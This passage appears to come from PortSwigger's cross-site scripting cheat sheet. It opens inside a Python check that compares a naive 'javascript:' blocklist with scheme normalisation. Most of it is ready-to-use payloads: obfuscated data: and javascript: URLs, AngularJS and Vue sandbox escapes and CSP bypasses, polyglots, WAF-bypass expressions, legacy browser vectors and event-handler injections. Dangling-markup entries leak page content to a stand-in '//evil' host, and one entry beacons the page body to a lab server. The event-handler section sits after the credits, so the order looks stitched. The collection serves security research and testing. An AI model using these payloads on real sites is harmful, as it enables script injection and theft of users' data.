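    """Decode character references as an HTML parser does for an attribute value.

    html.unescape implements the rules the Encoding table relies on: decimal
    (&#106) and hex (&#x6a, &#X6A) references with the semicolon optional when
    the next character cannot continue the number, leading zeros ignored, and
    HTML5 named references such as &colon; &Tab; &NewLine;.
    """
    return html.unescape(value)


def url_scheme(value: str) -> Optional[str]:
    """Return the lower-cased scheme a browser would resolve for an href/src
    value, or None when the value is a relative URL."""
    decoded = decode_attribute(value)
    decoded = _LEADING_JUNK.sub("", decoded)
    decoded = _STRIPPED_INSIDE.sub("", decoded)  # "javas\tcript:" -> "javascript:"
    match = _SCHEME.match(decoded)
    return match.group(1).lower() if match else None


def is_allowed_url(value: str) -> bool:
    """Allowlist check applied after normalisation: relative URLs and permitted
    schemes pass; javascript:, data:, vbscript: and everything else fail."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


def naive_is_allowed(value: str) -> bool:
    """The blocklist many filters start with: reject the raw text if it
    contains 'javascript:'. Included only to measure what it misses."""
    return "javascript:" not in value.lower()


# href values taken from the Protocols and Encoding tables above
# (constructed test inputs; "\t" stands in for the literal \x09).
VECTORS: List[str] = [
    "javascript:alert(1)",
    "JaVaScript:alert(1)",
    " javascript:alert(1)",            # \x20 before the protocol
    "javas\tcript:alert(1)",           # \x09 inside the protocol
    "javascript\t:alert(1)",           # \x09 before the colon
    "&#106avascript:alert(1)",         # decimal reference, no semicolon
    "&#0000106;avascript:alert(1)",    # decimal reference, zero padded
    "&#x6a;avascript:alert(1)",        # hex reference
    "j&#x61vascript:alert(1)",         # hex, no semicolon, next char not a-f0-9
    "&#X6A;avascript:alert(1)",        # hex, upper-case X
    "javascript&colon;alert(1)",       # named reference for the colon
    "java&Tab;script:alert(1)",        # named reference for \x09
    "java&NewLine;script:alert(1)",    # named reference for \x0a
]
# Values a sanitiser must keep letting through (constructed).
BENIGN: List[str] = ["https://portswigger.net/", "/relative/path", "mailto:a@example.com"]


def audit() -> Dict[str, int]:
    """Count the vectors each check lets through and the benign URLs the
    normalising check wrongly rejects."""
    return {
        "naive_misses": sum(naive_is_allowed(v) for v in VECTORS),
        "normalised_misses": sum(is_allowed_url(v) for v in VECTORS),
        "benign_rejected": sum(not is_allowed_url(v) for v in BENIGN),
    }


if __name__ == "__main__":
    for v in VECTORS:
        print(f"{v!r:36} scheme={url_scheme(v)!r} naive={naive_is_allowed(v)} normalised={is_allowed_url(v)}")
    print(audit())
```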

Obfuscation

Data protocol inside script src with base64
<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>

Data protocol inside script src with base64 and HTML entities
<script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>

Data protocol inside script src with base64 and URL encoding
<script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>

Iframe srcdoc HTML encoded
<iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>

Iframe JavaScript URL with HTML and URL encoding
<iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>

SVG script with unicode escapes and HTML encoding
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>

Client-side template injection

VueJS reflected

Version | Author | Length
Vector

All versions | Mario Heiderich (Cure53) | 41
{{constructor.constructor('alert(1)')()}}

All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62
<div v-html="''.constructor.constructor('alert(1)')()">a</div>

All versions | Gareth Heyes (PortSwigger) | 39
<x v-html=_c.constructor('alert(1)')()>

All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37
<x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes reflected

Version | Author | Length
Vector

1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41
{{constructor.constructor('alert(1)')()}}

1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33
{{$on.constructor('alert(1)')()}}

1.2.0 - 1.2.1 | Jan Horn (Google) | 122
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23
)))alert(1)

1.2.6 - 1.2.18 | Jan Horn (Google) | 106
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23
)))alert(1)

1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23
)))alert(1)

1.3.0 | Gábor Molnár (Google) | 272
{{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString('F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')))}}

1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.3.19 | Gareth Heyes (PortSwigger) | 102
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)');}}

1.3.20 | Gareth Heyes (PortSwigger) | 65
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}

1.5.9 - 1.5.11 | Jan Horn (Google) | 517
{{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}

>=1.6.0 | Mario Heiderich (Cure53) | 41
{{constructor.constructor('alert(1)')()}}

>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33
{{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy or no $eval)

Version | Author | Length
Vector

1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37
constructor.constructor('alert(1)')()

1.2.0 - 1.2.18 | Jan Horn (Google) | 118
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()

1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)

1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()

1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20
)))alert(1)

1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';

>=1.6.0 | Mario Heiderich (Cure53) | 37
constructor.constructor('alert(1)')()

1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Version | Author | Length
Vector

All versions (Chrome) | Gareth Heyes (PortSwigger) | 81
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">

All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute
<body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?

Link href stylesheet
<link rel=stylesheet href="//evil?

Link href icon
<link rel=icon href="//evil?

Meta refresh
<meta http-equiv="refresh" content="0; http://evil?

Img to pass markup through src attribute
<img src="//evil? <image src="//evil?

Video using track element
<video><track default src="//evil?

Video using source element and src attribute
<video><source src="//evil?

Audio using source element and src attribute
<audio><source src="//evil?

Input src
<input type=image src="//evil?

Button using formaction
<form><button style="width:100%;height:100%;" type=submit formaction="//evil?

Input using formaction
<form><input type=submit value="XSS" style="width:100%;height:100%;" type=submit formaction="//evil?

Form using action
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Object data
<object data="//evil?

Iframe src
<iframe src="//evil?

Embed src
<embed src="//evil?

Use textarea to consume markup and post to an external site
<form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using form target
<button form=x>XSS</button><form id=x action=//evil target='

Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs
<input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

WAF bypass global objects

XSS into a JavaScript string, string concatenation (window, self, this, top, parent, frames, globalThis)
window["ale"+"rt"](window["doc"+"ument"]["dom"+"ain"])
self["ale"+"rt"](self["doc"+"ument"]["dom"+"ain"])
this["ale"+"rt"](this["doc"+"ument"]["dom"+"ain"])
top["ale"+"rt"](top["doc"+"ument"]["dom"+"ain"])
parent["ale"+"rt"](parent["doc"+"ument"]["dom"+"ain"])
frames["ale"+"rt"](frames["doc"+"ument"]["dom"+"ain"])
globalThis["ale"+"rt"](globalThis["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, comment syntax (window, self, this, top, parent, frames, globalThis)
window[/*foo*/"alert"/*bar*/](window[/*foo*/"document"/*bar*/]["domain"])
self[/*foo*/"alert"/*bar*/](self[/*foo*/"document"/*bar*/]["domain"])
this[/*foo*/"alert"/*bar*/](this[/*foo*/"document"/*bar*/]["domain"])
top[/*foo*/"alert"/*bar*/](top[/*foo*/"document"/*bar*/]["domain"])
parent[/*foo*/"alert"/*bar*/](parent[/*foo*/"document"/*bar*/]["domain"])
frames[/*foo*/"alert"/*bar*/](frames[/*foo*/"document"/*bar*/]["domain"])
globalThis[/*foo*/"alert"/*bar*/](globalThis[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, hex escape sequence (window, self, this, top, parent, frames, globalThis)
window["\x61\x6c\x65\x72\x74"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
self["\x61\x6c\x65\x72\x74"](self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
this["\x61\x6c\x65\x72\x74"](this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
top["\x61\x6c\x65\x72\x74"](top["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
parent["\x61\x6c\x65\x72\x74"](parent["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
frames["\x61\x6c\x65\x72\x74"](frames["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence and base64 encoded string (window, self, this, top, parent, frames, globalThis)
window["\x65\x76\x61\x6c"](window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT")))
self["\x65\x76\x61\x6c"](self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT")))
this["\x65\x76\x61\x6c"](this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT")))
top["\x65\x76\x61\x6c"](top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT")))
parent["\x65\x76\x61\x6c"](parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT")))
frames["\x65\x76\x61\x6c"](frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT")))
globalThis["\x65\x76\x61\x6c"](globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, octal escape sequence (window, self, this, top, parent, frames, globalThis)
window["\141\154\145\162\164"]("\130\123\123")
self["\141\154\145\162\164"]("\130\123\123")
this["\141\154\145\162\164"]("\130\123\123")
top["\141\154\145\162\164"]("\130\123\123")
parent["\141\154\145\162\164"]("\130\123\123")
frames["\141\154\145\162\164"]("\130\123\123")
globalThis["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, unicode escape (window, self, this, top, parent, frames, globalThis)
window["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
self["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
this["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
top["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
parent["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
frames["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
globalThis["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, RegExp source property (window, self, this, top, parent, frames, globalThis)
window[/al/.source+/ert/.source](/XSS/.source)
self[/al/.source+/ert/.source](/XSS/.source)
this[/al/.source+/ert/.source](/XSS/.source)
top[/al/.source+/ert/.source](/XSS/.source)
parent[/al/.source+/ert/.source](/XSS/.source)
frames[/al/.source+/ert/.source](/XSS/.source)
globalThis[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck (window, self, this, top, parent, frames, globalThis)
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

Impossible labs

Title | Length limit | Closest vector
Description

Basic context, WAF blocks <[a-zA-Z] | N/A | N/A
This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag.

Script based injection, but quotes, forward slash and backslash are escaped | N/A | N/A
We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.

innerHTML context, but no equals allowed | N/A | N/A
You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.

Basic context, length limit | 15 | <q oncut=alert``
This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it?

Attribute context, length limit | 14 | oncut=alert``
The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?

Basic context, length limit, arbitrary code | 19 | <q/oncut=eval(name)
It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.

Attribute context, length limit, arbitrary code | 17 | See link
Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.

Injection occurs inside a frameset but before the body | N/A | N/A
We received a request from twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.

Injection occurs inside a single quoted string, only characters a-z0-9+` are allowed | N/A | N/A
The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.

Classic vectors (XSS crypt)

Image src with JavaScript protocol
<img src="javascript:alert(1)">

Body background with JavaScript protocol
<body background="javascript:alert(1)">

Iframe data URLs no longer work as modern browsers use a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

VBScript protocol used to work in IE: <a href=vbscript:MsgBox+1>XSS</a> <a href=# onclick=vbs:Msgbox+1>XSS</a> <a href=# onclick=VBS:Msgbox+1>XSS</a> <a href=# onclick=vbscript:Msgbox+1>XSS</a> <a href=# onclick=VBSCRIPT:Msgbox+1>XSS</a> <a href=# language=vbs onclick=vbscript:Msgbox+1>XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE: <a href=# onclick=jscript.compact:alert(1)>test</a> <a href=# onclick=JSCRIPT.COMPACT:alert(1)>test</a>

JScript.Encode allows encoded JavaScript: <a href=# language=JScript.Encode onclick=#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@>XSS</a> <a href=# onclick=JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@>XSS</a>

VBScript.Encode allows encoded VBScript: <iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

JavaScript entities used to work in Netscape Navigator: <a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator: <link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup: <form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup: <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL (Firefox only, <= 2): <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">

XBL also worked in FF3.5 using data URLs: <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">

CSS expressions (<= IE7): <div style="xss:expression(alert(1))"> <div style="xss:expression(1)-alert(1)"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio\006e(alert(1))"> <div style="xss:expressio\00006e(alert(1))"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio&#x5c;6e(alert(1))">

In quirks mode IE allowed you to use = instead of : <div style="xss=expression(alert(1))"> <div style="color&#x3d;red">test</div>

Behaviors for older modes of IE: <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions:

<script>function window.onload(){alert(1)}</script>
<script>function window::onload(){alert(1)}</script>
<script>function window.location(){}</script>
<body><script>function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}</script></body>
<body><script>function document.body.innerHTML(){x='<img src=1 onerror=alert(1)>'}</script></body>

GreyMagic HTML+time exploit (no longer works, even in 5 docmode): <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLs after &: <a href="javascript&#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities: <a href="javascript&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments: <!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have an onload event inside SVG: <svg><xss onload=alert(1)>

Isindex using src attribute: <isindex type=image src=//evil?

Isindex using submit: <isindex type=submit style="width:100%;height:100%;" value=XSS formaction=//evil?

Isindex and formaction: <isindex type=submit formaction=javascript:alert(1)>

Isindex and action: <isindex type=submit action=javascript:alert(1)>

Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.


ondragover: Triggered dragging over an element. <div draggable=true contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>

ondragstart: Requires a mouse drag. <xss draggable=true ondragstart=alert(1)>test</xss>

ondrop: Triggered dropping a draggable element. <div draggable=true contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>

onfullscreenchange: Fires when a video changes full screen status. <video onfullscreenchange=alert(1) src=validvideo.mp4 controls>

oninput: Requires a change of value. <input oninput=alert(1) value=xss>

oninvalid: Requires a form submission with an element that does not satisfy its constraints, such as a required attribute. <form><input oninvalid=alert(1) required><input type=submit>

onkeydown: Triggered when a key is pressed. <xss onkeydown=alert(1) contenteditable>test</xss>

onkeypress: Triggered when a key is pressed. <xss onkeypress=alert(1) contenteditable>test</xss>

onkeyup: Triggered when a key is released. <xss onkeyup=alert(1) contenteditable>test</xss>

onmousedown: Triggered when the mouse button is pressed. <xss onmousedown=alert(1)>test</xss>

onmouseenter: Triggered when the mouse is hovered over the element. <xss onmouseenter=alert(1)>test</xss>

onmouseleave: Triggered when the mouse is moved away from the element. <xss onmouseleave=alert(1)>test</xss>

onmousemove: Requires mouse movement. <xss onmousemove=alert(1)>test</xss>

onmouseout: Triggered when the mouse is moved away from the element. <xss onmouseout=alert(1)>test</xss>

onmouseover: Requires a hover over the element. <xss onmouseover=alert(1)>test</xss>

onmouseup: Triggered when the mouse button is released. <xss onmouseup=alert(1)>test</xss>

onmousewheel: Fires when the mouse wheel scrolls. <xss onmousewheel=alert(1)>requires scrolling

onmozfullscreenchange: Fires when a video changes full screen status. <video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>

onpagehide: Fires when the page is changed. <body onpagehide=navigator.sendBeacon('//ssl.portswigger-labs.net/',document.body.innerHTML)>

onpaste: Requires you to paste a piece of text. <a onpaste=alert(1) contenteditable>test</a>

onpause: Requires clicking the element to pause. <audio autoplay controls onpause=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onpointerdown: Fires on pointer (mouse) down. <xss onpointerdown=alert(1)>XSS</xss>

onpointerenter: Fires when the pointer enters the element. <xss onpointerenter=alert(1)>XSS</xss>

onpointerleave: Fires when the pointer leaves the element. <xss onpointerleave=alert(1)>XSS</xss>

onpointermove: Fires when the pointer moves. <xss onpointermove=alert(1)>XSS</xss>

onpointerout: Fires when the pointer moves out of the element. <xss onpointerout=alert(1)>XSS</xss>

onpointerover: Fires when the pointer moves over the element. <xss onpointerover=alert(1)>XSS</xss>

onpointerrawupdate: Fires when the pointer changes. <xss onpointerrawupdate=alert(1)>XSS</xss>

onpointerup: Fires on pointer (mouse) up. <xss onpointerup=alert(1)>XSS</xss>

onreset: Requires a click. <form onreset=alert(1)><input type=reset>

onsearch: Fires when a form is submitted and the input has a type attribute of search. <form><input type=search onsearch=alert(1) value="Hit return" autofocus>

onseeked: Requires clicking the element timeline. <audio autoplay controls onseeked=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onseeking: Requires clicking the element timeline. <audio autoplay controls onseeking=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onselect: Requires you to select text. <input onselect=alert(1) value=XSS autofocus>

onselectionchange: Fires when the text selection is changed on the page. <body onselectionchange=alert(1)>select some text

onselectstart: Fires when beginning a text selection. <body onselectstart=alert(1)>select some text

onshow: Fires when the context menu is shown. <div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>

onsubmit: Requires a form submission. <form onsubmit=alert(1)><input type=submit>

ontouchend: Fires when the touch screen is touched (mobile devices only). <body ontouchend=alert(1)>

ontouchmove: Fires when the touch screen is touched and moved (mobile devices only). <body ontouchmove=alert(1)>

